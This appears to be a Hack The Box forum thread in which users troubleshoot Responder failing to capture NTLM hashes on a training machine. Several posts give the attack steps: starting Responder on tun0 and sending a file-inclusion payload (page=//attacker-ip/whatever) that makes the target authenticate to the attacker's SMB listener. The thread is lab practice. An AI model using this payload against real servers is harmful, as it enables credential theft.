Responder not working on HTB network

Hey guys, looking for some advice on getting Responder to work through the VPN connection.

When running it I’ve always gotten:

“Listening for events …”

But never gotten any hashes. I assumed this was normal until someone told me otherwise.

I specify the interface as tun0

I might be wrong here, but I wouldn’t have thought it would work here. There isn’t likely to be much authentication traffic hitting your box unless you can get someone to do something which causes that to happen.

For example, on one of the boxes you can use a bit of injection-fu to make it talk to an SMB share on your machine which allows responder to capture hashes.

Not sure that anything useful would come from the Linux machines though.

I thought the same thing originally. I believe we’re talking about the same box. This probably isn’t a big deal.

Thanks for your reply!

Well, I revive this topic because even today I still had the same issue. I worked for hours to find why it doesn’t work on my VM, why it also doesn’t work on 2 others VMs of 2 differents computers or even on the pwnbox. Even on Discord, I searched for some help but nobody had the answer.

Since 25 minutes, my issue disappeared. For those wondering wtf this issue is happening, the only hint I can give you is: Parrot.

Now, I resolved it by using Kali. I don’t know how this magic works, but the " 3389 port used" error message from Responder didn’t show up, and the hash told me “Hi dude!” (you have to put your ear close of your screen for hear it).

So if you really want to continue without “cheat” with the pdf, do a 2nd VM by using Kali (or use only kali… why not).

To you who are reading this: you’re welcome, and have fun!

I have a different problem, I dont get any errors but I don’t see any hashes at all, I am using kali not parrot

For anyone else who may be stuck troubleshooting. Here are some options to try, I was stuck too. Read through all 3, you may have missed one.

A (yes I had to append one haha). If you put in the ip address into the browser and it wont let you see the unika.htb, you need to resolv the /etc/hosts file for the DNS server because the server is a server running HTB VM boxes, and they all share the same outgoing IP, so the domain name doesn’t know what ip to attach to.
go into > cd /etc/hosts and add the ‘IPADDRESS (tab space) unika.htb’, aparently you will have to do this over and over for htb boxes when its a web server to view the page for more enumeration…I just wanted to use the word enumeration to sound smart.

1 Make sure the interface you use when you start Responder is the interface that is connected to the HTB box. For me it was openvpn, so tun0.

2 Also make sure you are connected to the HTB box in the same environment you are running Responder, I was using tools in my Kali VM, but running the openvpn connection on my mac, so couldn’t read the traffic.

3 Once responder is up and running properly ‘python3 Responder.py -I tun0’, then make sure when you enter the web browser address to add smb payload ‘http://unika.htb/?page=//ipaddress/whatever’, the IPADDRESS is NOT the Responder HTB server you used to nmap earlier, its the ipaddress connected to our openvpn connection!. You can check this with ifconfig in kali or linux, and see what tun0 ip is or JUST GO into the running responder listening and look at the responder IP address after the responder NIC line of code…make sure you use that in the web address attack with page= :).

Hope this helps.

2 Likes

Thanks @htbperson
The 3rd point is where all of us get stuck.
Be sure to make the ipaddress the ip address of “tun0” not anything else.

I have added the correct url where the ipaddress mentioned is the one which corresponds to the tun0 on my local machine , but still on hitting the url no events are generated

1 Like

I am working on the Tier 1 Responder Machine and running into this same problem. Someone mentioned Parrot being an issue?

Would it be better to do this one in Pwnbox instead?

Another stumbling block: check the firewall on the client machine and make sure port tcp/445 (SMB) is open for incoming connections (since unika is trying to reach out to your client machine to get the requested file).

For future reference, once Responder.py is running you can check the ports it’s listening on with something like:

$ ss -tulpn | grep -iE 'port|tun0'

(Note: you can run this with root privileges to give you the process name as well.)

You can then allow access to all of these ports from the remote machine (i.e. unika). Alternatively, disable the firewall if you are lazy.

Don’t disable firewall. It’s bad habit and really not necessary. Please do port forwarding where always necessary, it’s a huge security risk getting into habits that serve no purpose when it’s easily achievable without doing this.

I would suggest you to download a UDP based vpn configuration. That resolved the issue for me. I am running a native Kali FYI.

1 Like

I am also on Kali and changed to UDP connection now. I’m using the IP from responder so it looks like http://unika.htb/index.php?page=//10.10.14.218/whatever/ but I still have the same issue.

I have same problem on Fedora. I thing problem is browser setting. I have run the http://ipAdress/whatever and I have been prompt for the user name and password in the browser and Responder show me my username and hash for my password. Any body know how to set up the Firefox?

Man, you saved my day.
I was struggling finding what’s wrong with responder, god bless you